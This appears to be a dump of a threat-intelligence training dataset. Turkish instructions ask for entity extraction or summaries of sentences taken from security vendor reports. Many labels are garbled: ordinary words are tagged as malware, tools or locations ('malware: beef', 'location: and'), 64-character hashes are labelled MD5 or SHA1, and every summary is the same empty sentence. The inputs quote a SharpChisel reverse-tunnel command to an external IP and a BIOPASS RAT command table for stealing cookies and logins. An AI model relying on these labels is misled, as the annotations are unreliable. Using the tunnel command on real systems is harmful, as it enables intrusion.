instruction
stringclasses
2 values
input
stringlengths
3
5.01k
output
stringlengths
10
5.79k
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Many of these also use the x4k name in the domain.
threat-actor: x4k
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The group invites other criminals to use its service.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We terminated 2 YouTube channels as part of our investigation into coordinated influence operations linked to Myanmar.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 3.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
HYPERSCRAPE won't run unless in a directory with other file dependencies.
malware: HYPERSCRAPE
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
A consolidated view of all security sensors provides a single-pane-of-glass view that will promote quick and thorough investigation and response.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Both use JPG as a delivering extension.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Command Behavior Compress_Files Compresses specified files or directories to a ZIP archive Decompress_File Extracts files from a specified ZIP archive AutoRun Creates a scheduled task for persistence CloseEverything Kills the Everything process with the command “TASKKILL /F /IM Everything.exe” OpenEverything Downloads and runs Everything from voidtools CloseFFmpegLive Kills the FFmpeg process with the command “TASKKILL /F /IM ffmpeg.exe” OpenFFmpegLive Downloads and runs FFmpeg (for screen video capture) DeleteFile Deletes files or directories at specified locations CreateDir Creates a directory at a specified location ShowFiles Gets the disk partition or lists a specified directory with detailed information, including file name, file path, size, create time, and time of modification Download_File Downloads a URL and saves the file to a specified location Upload_File Uploads the victim’s files to cloud storage uUninstall Kills the BIOPASS RAT process and deletes installed files. CloseObsLive Kills the OBS process with command “TASKKILL /F /IM obs64.exe” Open_Obs_Live Downloads OBS Studio and starts live streaming ProcessList Lists processes on the victim’s environment and their process identifier (PID) KillProcess Kills the process specified by PID with the TASKKILL command ScreenShot Takes a screenshot and uploads it to cloud storage Shell Executes commands or scripts (subcommands with prefixes subprocess, python, noreturn, getversion, restart) SnsInfo Lists QQ, WeChat, and Aliwangwang directories InstallTcpdump Downloads and installs the tcpdump tool PackingTelegram Compresses and uploads Telegram's “tdata” directory to cloud storage CloseProxy Kills frpc process with command “TASKKILL /F /IM frpc.exe” OpenProxy Downloads and installs the frp proxy client in the “%PUBLIC%” folder OpenVnc Downloads and installs jsmpeg-vnc tool in the “%PUBLIC%/vnc/” folder CloseVnc Kills the VNC process with the command “TASKKILL /F /IM vdwm.exe” GetBrowsersCookies Decrypts the cookie file of the browser and uploads it to cloud storage GetBrowsersLogins Decrypts the login file of the browser and uploads it to cloud storage GetBrowsersHistories Uploads the history file of the browser to cloud storage GetBrowsersBookmarks Uploads the bookmark file of the browser to cloud storage Table 2.
FILEPATH: Everything.exe
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
What causes it?
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
During the operation, 25.1 BTC from 538 wallets was sent to 1NDyJtNTjmwk5xPNhjgAMu4HDHigtobu1s (SHA256: CE11703DEF517306326C48A67A7C859A3DE0F18E2451DF226CE171389A5B7953), which is a wallet owned by Binance cryptocurrency exchange.
SHA2: CE11703DEF517306326C48A67A7C859A3DE0F18E2451DF226CE171389A5B7953; identity: Binance cryptocurrency exchange
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Trojan.MSIL.OCEANMAP.A
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
It was last updated on February 7, 2022.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The vast majority of these messages were sent to spam without any user ever seeing them, and we were able to preemptively block the domains using Safe Browsing.
tools: vast; location: ever; location: them; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Chrome extensions allow developers to extend Google’s Chrome browser, typically by adding new functionality.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
If you have communicated with any of these accounts or visited the actors’ blog, we suggest you review your systems for the IOCs provided below.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
According to a report by Bloomberg, JBS USA had shutdowns at its nine beef plants on Tuesday, May 31.
malware: beef
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We use our research to continuously improve the safety and security of our products and share this intelligence with our industry peers.
tools: safety; location: and; location: security; location: and; location: industry
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Macros Macros are the most straight-forward way for an attacker to weaponize Office documents.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Recently, we found email accounts from top universities across the world being sold on Taobao, the largest consumer-to-consumer (C2C) e-commerce platform in China.
SOFTWARE: Taobao; location: China
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
It was also observed that one of the samples deployed MicroBackdoor, an open-source backdoor allowing an attacker to browse the file system, upload and download files, execute commands, and remove itself from the system.
malware: MicroBackdoor
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
He claimed that he wasn’t able to install the app.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In total, the following 14 functions are loaded during runtime:
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In a data breach notice to affected users, events application Peatix said it learned that user account data had been improperly accessed.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 7.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Comprehensive details on both of these are available at https://meltdownattack.com.
URL: https://meltdownattack.com
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Trojan.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
ALIEN lives inside multiple privileged processes and receives commands from PREDATOR over IPC.
malware: ALIEN; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
C++ style pseudo code of ProtectedFree function
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 3.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
A proactive, multilayered approach to security is key against a wide range of threats— from the gateway, endpoints, networks, and servers.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
And the reason why I want to tackle this today is because I've had some conversations in the last few days that have really kind of hit that idea bulb that people don't truly understand how cybercriminals get away with their crimes in the organization.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
AWS starts with the customer and works backwards.
identity: AWS
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
An example of this technique, used to target Facebook users, can be seen in the screenshot below.
SOFTWARE: Facebook
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In some cases, a single file lost is more than enough to count as a fully successful attack.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
, it will directly upload the cookie file to cloud storage.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Vigenère cipher in ServHelper and the Delphi code in stack overflow
malware: ServHelper; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Note that this does not cover all the samples – it is possible that other payloads are being deployed as well.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
There were no accounts compromised from this campaign and Google will alert all targeted users of these attempts through our monthly government-backed attacker warnings.
identity: Google
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The group is making quadruple extortion available to its affiliates and showing a clear sign of innovation.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We have not yet confirmed the initial infection vector for this new Petya variant.
malware: Petya
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In contrast to bitcoin, Monero was designed to enable private transactions using a closed ledger, and its mining algorithm is still mined effectively by both PC CPUs and GPUs.
SOFTWARE: Monero
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Microsoft has already credited our team with 14 previous IE vulnerabilities in 2014, bringing our total for the year up to 35.
identity: Microsoft; SOFTWARE: IE; TIME: 2014
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Once a user opens the website in the browser, it starts making requests to various Ukrainian news sites and lists the number of requests made to each new site on the home page, as shown in Figure 12 below.
identity: Ukrainian news sites
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In the blog describing Operation Earth Kitsune, we noted sites using the GNUBoard Content Management System (CMS) had been compromised and were used to host malware.
campaign: Operation Earth Kitsune; SOFTWARE: GNUBoard Content ; malware: malware
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Since late 2019, our team has disrupted financially motivated phishing campaigns targeting YouTubers with Cookie Theft malware.
attack-pattern: phishing
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Take, for example, the previously mentioned pikrpro[.]eu.
DOMAIN: pikrpro[.]eu
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Encrypted configurations of Protux (top) and Marade (bottom) in the same blog post Correlating Marade and Protux
malware: Protux; malware: Marade; malware: Marade; malware: Protux
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
But what if IE is running and also updating that file?
SOFTWARE: IE
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
These threats affect all users of the tampered software, resulting in major consequences for government, critical infrastructure, and private sector software consumers.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Sometimes, when that target is a high-value target this attack can also be referred to as ‘Whaling”. In our new research, our Unit 42 research team has found an attack that takes the refining of spear phishing one step further.
identity: Unit 42 research team; attack-pattern: spear phishing
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The malware selects a randomly chosen DLL from this directory.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Malicious Excel files that TA505 distributed had information harvesting capabilities.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
JS.TRX.XXJSE9EFF018
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 1.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Another instance of SharpChisel with different settings is executed, this time using PowerShell using the following command line: powershell.exe C:\programdata\SharpChisel.exe client 87.236.212[.]184:443 R:8888:127.0.0.1:9999
location: time; attack-pattern: PowerShell
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Greg Young, vice president of cybersecurity at Trend Micro, discusses BeyondProd’s value in this article.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
About: Threat Briefs are meant to help busy people understand real-world threats and how they can prevent them in their lives.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Trend Micro Cloud One™ – Workload Security is a cloud-native solution that provides automated security via powerful APIs.
SOFTWARE: Trend Micro Cloud One™
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
However, as the rshell sample was found in 2021, we initially did not find this correlation strong enough to attribute the rshellmalware family to Iron Tiger.
location: sample; location: strong; threat-actor: Iron Tiger
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This new kind of attack tells us that at least some cybercriminals are starting to view theft of victim’s computing power to translate into cryptocurrencies as a better business proposition than the traditional practice of loading malware on the victim’s system through drive-by downloads.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Once this object is freed the whole page is marked as invalid.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
It was delivered only if the victim’s source IP address (and time) met Lurk’s parameters—otherwise users received a 404 error response.
location: only; attack-pattern: source; location: and; location: time; malware: Lurk
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We found that the returned script is a backdoor that gets its instructions from the WebSocket server.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Stage 1 is a simple download & execute program.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
STRINGDATA::BROWSER_SESSION_ID
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
APP has a strong track record protecting users – since the program’s inception, there are no documented cases of an account compromise via phishing.
attack-pattern: account compromise via phishing
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Once the target agreed to the deal, a malware landing page disguised as a software download URL was sent via email or a PDF on Google Drive, and in a few cases, Google documents containing the phishing links.
location: target; location: deal; location: landing; tools: page; location: and; attack-pattern: phishing
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Updated June 7 to add additional in-the-wild observations.
TIME: June 7
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
A new targeted attack has infected several organizations in Taiwan with a new ransomware family, which we have dubbed ColdLock.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
On the left, Confucius code, on the right, Patchwork’s code
threat-actor: Confucius; threat-actor: Patchwork
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 6.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The scripts are designed for web server infection via a cross-site scripting (XSS) attack.
attack-pattern: cross-site scripting (XSS) attack
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
EXOTIC LILY activities overlap with a group tracked as DEV-0413 (Microsoft) and were also described by Abnormal in their recent post.
threat-actor: EXOTIC LILY; threat-actor: DEV-0413; location: and; location: post
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
As part of our wider tracking of APT31 activity, we've also seen them deploy targeted malware campaigns.
location: them; attack-pattern: targeted malware
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Instead of just one new variant, we discovered four different versions of ANEL: 5.0.0 beta1 5.1.1 rc 5.1.2 rc1 5.2.0 rev1 The different versions contain changes in the ANEL loader and the main ANEL DLL.
malware: ANEL; malware: ANEL; malware: ANEL
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
3. “noreturn”: executes a system command using the Python function “win32api.ShellExecute” without waiting for the result.
SOFTWARE: Python
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Shaping the roadmap ROS-I is an open-source project devoted to extending the capabilities of the Robot Operating Systems (ROS) into industrial hardware and applications.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
A phishing webpage targeting a Ukrainian state administration employee, detected by our in-house machine learning models on March 16.Our teams at Palo Alto Networks are actively monitoring the phishing landscape surrounding Ukraine-related URLs and are sharing this threat intelligence with relevant authorities in Ukraine and internationally.
attack-pattern: phishing; attack-pattern: phishing; identity: Ukrainian state administration employee; TIME: March 16; identity: Palo Alto Networks; location: Ukraine
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Well, yeah, absolutely.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Based on this behavior, we can map out a pattern, from the downloader to the decoy documents used.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The vulnerability affects the Toast feature on Android devices, an Android feature that allows display messages and notifications of other applications to “pop up,” and allows an attacker to employ an overlay attack.
SOFTWARE: Android; SOFTWARE: Android
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Oh, absolutely.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369 35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208 5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798 6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f 767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4 977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f ac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6 cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa Microsoft Live DLL 1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23 PDB E:\Working\Projects\EmailDownloader\EmailDownloaderCookieMode\EmailDownloader\obj\Debug\EmailDownloader.pdb E:\Working\Projects\EmailDownloader\EmailDownloaderCookieMode\Mahdi\LiveLib\obj\Release\LiveLib.pdb
SHA2: 03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369; SHA1: 35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208; SHA1: 5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798; MD5: 6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f; SHA2: 767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4; SHA2: 977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f; SHA2: ac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6; SHA2: cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa; identity: Microsoft; MD5: 1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
WildFire users can rest assured that they’ll be protected from whatever Kuluoz has in-store next.
SOFTWARE: WildFire; malware: Kuluoz
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Note the following similarities: The usage of paths C:\Users and D:\ are similar The searching patterns are very similar The extension list is very similar
FILEPATH: D:\; FILEPATH: C:\Users
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
File name SHA256 Detection Name MsdUpdate.exe e954ff741baebb173ba45fbcfdea7499d00d8cfa2933b69f6cc0970b294f9ffd Trojan.Win32.NYMERIA.MLR MsdUpdate.exe b58a2ef01af65d32ca4ba555bd72931dc68728e6d96d8808afca029b4c75d31e Trojan.Win32.SCAR.AB MsdUpdate.exe a67461a0c14fc1528ad83b9bd874f53b7616cfed99656442fb4d9cdd7d09e449 Trojan.Win32.SCAR.AC MsdUpdate.exe c303454efb21c0bf0df6fb6c2a14e401efeb57c1c574f63cdae74ef74a3b01f2 Trojan.Win32.NYMERIA.MLW MsdUpdate.exe 75e6bafc4fa496b418df0208f12e688b16e7afdb94a7b30e3eca532717beb9ba Trojan.Win32.SCAR.AD MsdUpdate.exe 8fb6cbf6f6b6a897bf0ee1217dbf738bce7a3000507b89ea30049fd670018b46 Trojan.Win32.SCAR.AD DysonPart.exe ba9d76cca6b5c7308961cfe3739dc1328f3dad9a824417fad73b842b043daa1a Trojan.Win32.SCAR.AD Unknown 07e1baf1d0207a139bcf39c60354666496e4331381d36eef9359120b1d8497f1 Trojan.Win32.SCAR.AD
MD5: e954ff741baebb173ba45fbcfdea7499d00d8cfa2933b69f6cc0970b294f9ffd; SHA1: b58a2ef01af65d32ca4ba555bd72931dc68728e6d96d8808afca029b4c75d31e; SHA2: a67461a0c14fc1528ad83b9bd874f53b7616cfed99656442fb4d9cdd7d09e449; SHA2: c303454efb21c0bf0df6fb6c2a14e401efeb57c1c574f63cdae74ef74a3b01f2; SHA2: 75e6bafc4fa496b418df0208f12e688b16e7afdb94a7b30e3eca532717beb9ba; MD5: 8fb6cbf6f6b6a897bf0ee1217dbf738bce7a3000507b89ea30049fd670018b46; SHA1: ba9d76cca6b5c7308961cfe3739dc1328f3dad9a824417fad73b842b043daa1a; SHA2: 07e1baf1d0207a139bcf39c60354666496e4331381d36eef9359120b1d8497f1
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Based on this detection, the service scans the associated Amazon EBS storage environment for malware and reports any findings to AWS Security Hub.
SOFTWARE: Amazon EBS storage environment; SOFTWARE: AWS Security Hub
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
When users register, their credit cards will be charged.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
“jh” itself is more common than would be expected given that, with fingers on the home row, it requires the right index finger to move and press another key before any other key is struck.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Cryptocurrency-focused threats is a key area that all defenders should focus their intelligence and prevention efforts around in 2018.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Some ransomware families, including Babuk, Sodinokibi, Cerber, Mailto, Ryuk and others, seldom show the ransom amount or cryptocurrency wallet address.
malware: Sodinokibi; malware: Babuk; malware: Cerber; malware: Ryuk; malware: Mailto
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Additionally, Windows XP systems running IE 6, 7 and 8 are also vulnerable, but will not receive a patch, as Microsoft no longer supports them.
identity: Microsoft; SOFTWARE: Windows XP; SOFTWARE: IE 6, 7 and 8
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Moreover, decision-makers and stakeholders should have a better understanding of cybersecurity and its role in securing their operations and the safety of consumers.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Commands
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369 35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208 5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798 6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f 767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4 977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f ac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6 cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa Microsoft Live DLL 1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23 PDB E:\Working\Projects\EmailDownloader\EmailDownloaderCookieMode\EmailDownloader\obj\Debug\EmailDownloader.pdb E:\Working\Projects\EmailDownloader\EmailDownloaderCookieMode\Mahdi\LiveLib\obj\Release\LiveLib.pdb
SHA1: 03d0e7ad4c12273a42e4c95d854408b98b0cf5ecf5f8c5ce05b24729b6f4e369; SHA1: 35a485972282b7e0e8e3a7a9cbf86ad93856378fd96cc8e230be5099c4b89208; SHA1: 5afc59cd2b39f988733eba427c8cf6e48bd2e9dc3d48a4db550655efe0dca798; SHA1: 6dc0600de00ba6574488472d5c48aa2a7b23a74ff1378d8aee6a93ea0ee7364f; SHA2: 767bd025c8e7d36f64dbd636ce0f29e873d1e3ca415d5ad49053a68918fe89f4; SHA1: 977f0053690684eb509da27d5eec2a560311c084a4a133191ef387e110e8b85f; SHA1: ac8e59e8abeacf0885b451833726be3e8e2d9c88d21f27b16ebe00f00c1409e6; SHA1: cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa; identity: Microsoft; SHA1: 1a831a79a932edd0398f46336712eff90ebb5164a189ef38c4dacc64ba84fe23
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
It provides a comprehensive defense tailored to protect organizations against targeted attacks and advanced threats through specialized engines, custom sandboxing, and seamless correlation across the entire attack life cycle, allowing it to detect threats delivered by Blackgear even without any engine or pattern update.
threat-actor: Blackgear
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Gone are the days in which these attacks only target the endpoint, and as such, an expanded connected threat defense is paramount.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Delete email message Permanently deletes the specified email message from the user’s mailbox
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The address of the anchor element is 0x0c3b3f98.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We found that the Reaver malware family has shared command-and-control (C2) infrastructure overlap SunOrcal malware, and that these have been used concurrently since late 2016.
malware: Reaver; malware: SunOrcal; TIME: 2016